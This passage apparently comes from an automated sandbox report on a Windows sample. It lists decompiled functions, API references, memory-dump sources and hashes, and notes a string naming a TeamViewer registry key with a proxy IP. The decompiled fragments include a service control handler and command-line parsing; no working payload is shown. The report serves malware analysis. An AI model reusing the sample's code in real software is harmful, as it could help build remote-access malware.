                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseH_prolog3H_prolog3_Openchar_traits
                                                                                                        • String ID: Proxy_IP$SOFTWARE\TeamViewer3
                                                                                                        • API String ID: 1636729521-564699907
                                                                                                        • Opcode ID: 12a46757260d255f23facb7f4d1e95832c163e61f80436c4d09c54a18e601abd
                                                                                                        • Instruction ID: bcc368aa53542c86c2cb5e05f7fa938efaf3251d6d3b89b37230df6600facaff
                                                                                                        • Opcode Fuzzy Hash: 12a46757260d255f23facb7f4d1e95832c163e61f80436c4d09c54a18e601abd
                                                                                                        • Instruction Fuzzy Hash: A631A370905148AADF15EBE9C856AEDBF39AF24308F14806EF111771D1DA785F08C765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004167AB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004167B2
                                                                                                        • codecvt.LIBCPMT ref: 004167F3
                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 00416824
                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041682A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3IncrefRegistercodecvtstd::locale::facet::_std::locale::facet::facet_
                                                                                                        • String ID: bad cast
                                                                                                        • API String ID: 1071029599-3145022300
                                                                                                        • Opcode ID: 713b91da343e90a8d951406ed875e737fc51c51d151fd88b4211d0f55774cf5b
                                                                                                        • Instruction ID: 2b815d97ff2e244cc09361beeea4d35a65eaf0dc4f538e06f9ae997cda8be315
                                                                                                        • Opcode Fuzzy Hash: 713b91da343e90a8d951406ed875e737fc51c51d151fd88b4211d0f55774cf5b
                                                                                                        • Instruction Fuzzy Hash: 3901C47190011697DF05FBA0C856AEEB775BF80720F15161AE111AB2D1DF38DD42C795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0041BA3A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0041BA41
                                                                                                        • ctype.LIBCPMT ref: 0041BA82
                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0041BAB3
                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041BAB9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3IncrefRegisterctypestd::locale::facet::_std::locale::facet::facet_
                                                                                                        • String ID: bad cast
                                                                                                        • API String ID: 4174209172-3145022300
                                                                                                        • Opcode ID: cf217678213f89b393a3fbb5edda409c66b9fae7562a868d0c242f30da00ac74
                                                                                                        • Instruction ID: a76356c260c168ed5891337836b1ee3f77fb3caad6dbeb86e808316f575d28fe
                                                                                                        • Opcode Fuzzy Hash: cf217678213f89b393a3fbb5edda409c66b9fae7562a868d0c242f30da00ac74
                                                                                                        • Instruction Fuzzy Hash: 5D01007190020A87CF01FBA0C896AEE7775BF907A0F28021AE110BB2D1DF389E418791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00548F60, Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00548F75
                                                                                                          • Part of subcall function 005445FC: __mtinitlocknum.LIBCMT ref: 00544610
                                                                                                          • Part of subcall function 005445FC: __amsg_exit.LIBCMT ref: 0054461C
                                                                                                          • Part of subcall function 005445FC: EnterCriticalSection.KERNEL32(?,?,?,005347A4,00000004,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?), ref: 00544624
                                                                                                        • __mtinitlocknum.LIBCMT ref: 00548FB5
                                                                                                        • __malloc_crt.LIBCMT ref: 00548FF6
                                                                                                        • ___crtInitCritSecAndSpinCount.LIBCMT ref: 0054901B
                                                                                                        • EnterCriticalSection.KERNEL32(?,007D5DC8,00000010,005373C4,007D57C0,0000000C,0051488C,?,?,?), ref: 00549045
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSection__mtinitlocknum$CountCritInitSpin___crt__amsg_exit__lock__malloc_crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 1486408876-0
                                                                                                        • Opcode ID: 0d388ce755ce8365d2f47d55b717dad14f142b17fe0dcf228fb099c50193017f
                                                                                                        • Instruction ID: e88c2ed45bff812e44dbb6c86f147a4584581116ba0a3881f4b2688809bb5d23
                                                                                                        • Opcode Fuzzy Hash: 0d388ce755ce8365d2f47d55b717dad14f142b17fe0dcf228fb099c50193017f
                                                                                                        • Instruction Fuzzy Hash: 5531F276500702DFD731DFA9D88AAAAFBF4BF8A324B50452DE554876A1CB34E845CF40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A6D0, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E7098A6D0() {
				int _v4;
				intOrPtr _v12;
				short _v14;
				short _v16;
				short* _t12;
				intOrPtr* _t15;
				short _t18;
				intOrPtr _t26;
				void* _t30;
				signed int _t33;

				_t12 = GetCommandLineW();
				if(_t12 == 0) {
					L20:
					ExitProcess(0);
				}
				_v4 = 0;
				_t30 = CommandLineToArgvW(_t12,  &_v4);
				if(_t30 == 0) {
					L19:
					goto L20;
				}
				_t26 = _v12;
				if(_t26 <= 2) {
					L18:
					LocalFree(_t30);
					goto L19;
				}
				_t33 = 2;
				if(_t26 <= 2) {
					L17:
					goto L18;
				}
				do {
					_t15 =  *((intOrPtr*)(_t30 + _t33 * 4));
					if( *((short*)(_t15 + 2)) != 0) {
						goto L10;
					}
					_v16 =  *_t15;
					_v14 = 0;
					CharLowerW( &_v16);
					_t18 = _v16;
					if(_t18 == 0x66) {
						E7098A5C0(1);
						L15:
						L16:
						goto L17;
					}
					if(_t18 == 0x65) {
						E7098A5C0(0);
						goto L15;
					}
					if(_t18 == 0x75) {
						_push(1);
						E7098A020();
						goto L15;
					}
					_t26 = _v12;
					L10:
					_t33 = _t33 + 1;
				} while (_t33 < _t26);
				goto L16;
			}













                                                                                                        0x7098a6d3
                                                                                                        0x7098a6db
                                                                                                        0x7098a788
                                                                                                        0x7098a78a
                                                                                                        0x7098a78a
                                                                                                        0x7098a6e8
                                                                                                        0x7098a6f6
                                                                                                        0x7098a6fa
                                                                                                        0x7098a787
                                                                                                        0x00000000
                                                                                                        0x7098a787
                                                                                                        0x7098a700
                                                                                                        0x7098a707
                                                                                                        0x7098a780
                                                                                                        0x7098a781
                                                                                                        0x00000000
                                                                                                        0x7098a781
                                                                                                        0x7098a70a
                                                                                                        0x7098a711
                                                                                                        0x7098a77f
                                                                                                        0x00000000
                                                                                                        0x7098a77f
                                                                                                        0x7098a720
                                                                                                        0x7098a720
                                                                                                        0x7098a728
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098a734
                                                                                                        0x7098a739
                                                                                                        0x7098a73e
                                                                                                        0x7098a740
                                                                                                        0x7098a749
                                                                                                        0x7098a764
                                                                                                        0x7098a77b
                                                                                                        0x7098a77e
                                                                                                        0x00000000
                                                                                                        0x7098a77e
                                                                                                        0x7098a74f
                                                                                                        0x7098a76d
                                                                                                        0x00000000
                                                                                                        0x7098a76d
                                                                                                        0x7098a755
                                                                                                        0x7098a774
                                                                                                        0x7098a776
                                                                                                        0x00000000
                                                                                                        0x7098a776
                                                                                                        0x7098a757
                                                                                                        0x7098a75b
                                                                                                        0x7098a75b
                                                                                                        0x7098a75c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCharExitFreeLocalLowerProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 788958080-0
                                                                                                        • Opcode ID: df3a559356a81a68da7d72d2d5f4037c2d66d3f593eb4b71c5da7405d42a4ef7
                                                                                                        • Instruction ID: cda545f3184729ef2bb8b142a7c7e3234d97718558b8215467986e445225847b
                                                                                                        • Opcode Fuzzy Hash: df3a559356a81a68da7d72d2d5f4037c2d66d3f593eb4b71c5da7405d42a4ef7
                                                                                                        • Instruction Fuzzy Hash: 0F119D758083029EE3009F18C8C5F6E77F9EB84305F504529E94B863D4E7789C45E663
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985310, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 52%
                                                                                                        			E70985310() {
				intOrPtr _v0;
				char _v524;
				char _v528;
				short _v536;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t19;
				void* _t30;
				void* _t31;

				_t30 =  &_v524;
				_push(0x20a);
				_push( &_v524);
				L7098BF02();
				_t10 = _v0;
				if(_t10 == 0) {
					_t10 =  *0x7098f5e0; // 0xa42bb0
				}
				_push(_t10);
				_t19 = wsprintfW( &_v536, StrChrW(0x7098ca80, 0x22));
				_t13 = _v0;
				_t31 = _t30 + 0xc;
				if(_t13 > 0) {
					_push(_t13);
					wsprintfW(_t31 + 0x14 + _t19 * 2, StrChrW(0x7098ca70, 0x20));
					_t31 = _t31 + 0xc;
				}
				_t14 =  *0x7098f584; // 0x799d88
				_push(_t14);
				_push(0);
				_push(0);
				_push(0);
				return E70985220( &_v528, 1, 0);
			}













                                                                                                        0x70985310
                                                                                                        0x70985316
                                                                                                        0x7098531f
                                                                                                        0x70985320
                                                                                                        0x70985325
                                                                                                        0x7098532e
                                                                                                        0x70985330
                                                                                                        0x70985330
                                                                                                        0x7098533e
                                                                                                        0x70985356
                                                                                                        0x70985358
                                                                                                        0x7098535f
                                                                                                        0x70985364
                                                                                                        0x70985366
                                                                                                        0x70985376
                                                                                                        0x70985378
                                                                                                        0x70985378
                                                                                                        0x7098537b
                                                                                                        0x70985380
                                                                                                        0x70985381
                                                                                                        0x70985383
                                                                                                        0x70985385
                                                                                                        0x709853a1

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(0000020A,0000020A), ref: 70985320
                                                                                                        • StrChrW.SHLWAPI(7098CA80,00000022,?,?,?,?,0000020A,0000020A), ref: 70985346
                                                                                                        • wsprintfW.USER32 ref: 70985354
                                                                                                        • StrChrW.SHLWAPI(7098CA70,00000020,?,?,0000020A,0000020A), ref: 7098536E
                                                                                                        • wsprintfW.USER32 ref: 70985376
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 3693688802-0
                                                                                                        • Opcode ID: aa9bf33605f75c70d378e17c19165f7f59432fc4df0aa057572f92d7d107481d
                                                                                                        • Instruction ID: eca15b608d50d05565506055cb54d44c558ab8d9b4a6c3a785a7030edf8ad5c2
                                                                                                        • Opcode Fuzzy Hash: aa9bf33605f75c70d378e17c19165f7f59432fc4df0aa057572f92d7d107481d
                                                                                                        • Instruction Fuzzy Hash: FB0188B27543007BE220DB959C86FAF739CDB88704F540525FA45D73D1E674E90487A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983BC0, Relevance: 7.5, APIs: 5, Instructions: 47memorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983BC0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;

				_t9 = _a4 - 1;
				if(_t9 > 0xd) {
					L10:
					SetServiceStatus( *0x7098f3c4, 0x7098f4ec);
					return 0;
				}
				switch( *((intOrPtr*)(( *(_t9 + 0x70983c98) & 0x000000ff) * 4 +  &M70983C84))) {
					case 0:
						 *0x7098f4f0 = 1;
						 *0x7098f4f8 = 0;
						 *0x7098f500 = 0;
						 *0x7098f504 = 0;
						goto L10;
					case 1:
						 *0x7098f4f0 = 7;
						goto L10;
					case 2:
						 *0x7098f4f0 = 4;
						goto L10;
					case 3:
						if(_a8 == 5) {
							_t13 = _a12;
							_t20 = _t19 | 0xffffffff;
							if(_t13 != 0) {
								_t20 =  *(_t13 + 4);
							}
							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
							if(_t15 != 0) {
								 *_t15 = _t20;
								CloseHandle(CreateThread(0, 0, E70983A80, _t15, 0, 0));
							}
						}
						goto L10;
					case 4:
						goto L10;
				}
			}




                                                                                                        0x70983bc4
                                                                                                        0x70983bc9
                                                                                                        0x70983c6a
                                                                                                        0x70983c76
                                                                                                        0x70983c7f
                                                                                                        0x70983c7f
                                                                                                        0x70983bd6
                                                                                                        0x00000000
                                                                                                        0x70983c42
                                                                                                        0x70983c4c
                                                                                                        0x70983c56
                                                                                                        0x70983c60
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983c2a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983c36
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983be2
                                                                                                        0x70983be8
                                                                                                        0x70983bec
                                                                                                        0x70983bf1
                                                                                                        0x70983bf3
                                                                                                        0x70983bf3
                                                                                                        0x70983c01
                                                                                                        0x70983c09
                                                                                                        0x70983c19
                                                                                                        0x70983c22
                                                                                                        0x70983c22
                                                                                                        0x70983c09
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 70983BFA
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983C01
                                                                                                        • CreateThread.KERNEL32 ref: 70983C1B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70983C22
                                                                                                        • SetServiceStatus.ADVAPI32(00000000,7098F4EC), ref: 70983C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 3654718518-0
                                                                                                        • Opcode ID: eb8f1d482131dbebc28579f7728521b4896eaa480bd1e43d26e66b71314d8112
                                                                                                        • Instruction ID: 6480acd049039ae64ed6099c3a95264f2abe7941bc6fac3ff069dcc399774ce4
                                                                                                        • Opcode Fuzzy Hash: eb8f1d482131dbebc28579f7728521b4896eaa480bd1e43d26e66b71314d8112
                                                                                                        • Instruction Fuzzy Hash: 89113CF3218300ABE3008F6ACC6CB1B36A4F751715F21D569F995AB3E1E3799801AB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00534781, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 0053479F
                                                                                                          • Part of subcall function 005445FC: __mtinitlocknum.LIBCMT ref: 00544610
                                                                                                          • Part of subcall function 005445FC: __amsg_exit.LIBCMT ref: 0054461C
                                                                                                          • Part of subcall function 005445FC: EnterCriticalSection.KERNEL32(?,?,?,005347A4,00000004,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?), ref: 00544624
                                                                                                        • ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                        • ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                        • HeapFree.KERNEL32(00000000,?,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 005347E9
                                                                                                        • GetLastError.KERNEL32(?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 005347FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: b086111c3e2778bef15db49073f1fa25d21c9a8290b6c72624c3c6513a566978
                                                                                                        • Instruction ID: aa6f19fdca9f5d674bc5b41208df79506562bb03828fa21c8c922d719d85d9b4
                                                                                                        • Opcode Fuzzy Hash: b086111c3e2778bef15db49073f1fa25d21c9a8290b6c72624c3c6513a566978
                                                                                                        • Instruction Fuzzy Hash: DC016271941212ABEF206FB1AC0E79E7FA4BF82725F208619F501A60D1DB38A9418F58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00533B15, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 0053479F
                                                                                                          • Part of subcall function 005445FC: __mtinitlocknum.LIBCMT ref: 00544610
                                                                                                          • Part of subcall function 005445FC: __amsg_exit.LIBCMT ref: 0054461C
                                                                                                          • Part of subcall function 005445FC: EnterCriticalSection.KERNEL32(?,?,?,005347A4,00000004,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?), ref: 00544624
                                                                                                        • ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                        • ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                        • HeapFree.KERNEL32(00000000,?,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 005347E9
                                                                                                        • GetLastError.KERNEL32(?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 005347FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: 297b4d32e5798bd2ee0a523756a167b43be31cdf21281e49c9a7256e0d694db7
                                                                                                        • Instruction ID: 8c23bc174967bbd33b4183c54eff6a66e51670e9df721f186eb6da9cc75053d0
                                                                                                        • Opcode Fuzzy Hash: 297b4d32e5798bd2ee0a523756a167b43be31cdf21281e49c9a7256e0d694db7
                                                                                                        • Instruction Fuzzy Hash: 8A016271941212ABEF216FB0AC0A79D7FA4FF82725F208619F501A60D1DB38A9428F58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982E50, Relevance: 7.5, APIs: 5, Instructions: 35sleepwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70982E50() {
				struct HWND__* _t1;
				int _t3;
				void* _t10;

				_t1 =  *0x7098f3c8; // 0xc003a
				if(_t1 != 0) {
					_t3 = IsWindow(_t1);
					_t1 =  *0x7098f3c8; // 0xc003a
					if(_t3 != 0) {
						PostMessageW(_t1, 0x10, 0, 0);
						_t1 =  *0x7098f3c8; // 0xc003a
					}
				}
				_t10 = 0;
